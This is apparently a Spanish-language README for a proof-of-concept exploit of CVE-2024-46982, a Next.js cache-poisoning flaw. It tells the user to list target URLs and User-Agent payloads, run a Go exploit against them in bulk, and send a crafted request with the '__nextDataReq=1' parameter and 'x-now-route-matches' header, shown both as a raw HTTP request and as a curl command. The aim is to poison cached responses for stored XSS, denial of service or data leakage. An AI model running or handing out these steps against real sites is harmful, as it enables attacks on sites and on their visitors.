
POC CVE-2024-46982
Esta herramienta automatiza la detección y explotación de CVE-2024-46982, una vulnerabilidad de envenenamiento de caché en Next.js, donde las respuestas de Renderizado del Lado del Servidor (SSR) pueden ser cacheadas incorrectamente como Generación de Sitio Estático (SSG). Esta mala configuración puede provocar XSS Almacenado, DoS y fuga de datos, permitiendo a los atacantes inyectar contenido malicioso en las respuestas cacheadas.
Cree un archivo llamado targets.txt que contenga una URL objetivo por línea:
https://vulnerable-site.com
https://another-target.com
Cree un archivo llamado payloads.txt que contenga payloads que se inyectarán a través del encabezado User-Agent:
Compile y ejecute el exploit con:
go run exploit.go -f targets.txt -p payloads.txt -d 5
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
Envíe una solicitud maliciosa con curl:
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
-H "User-Agent: " \
-H "x-now-route-matches: 1"
Visite el endpoint en un navegador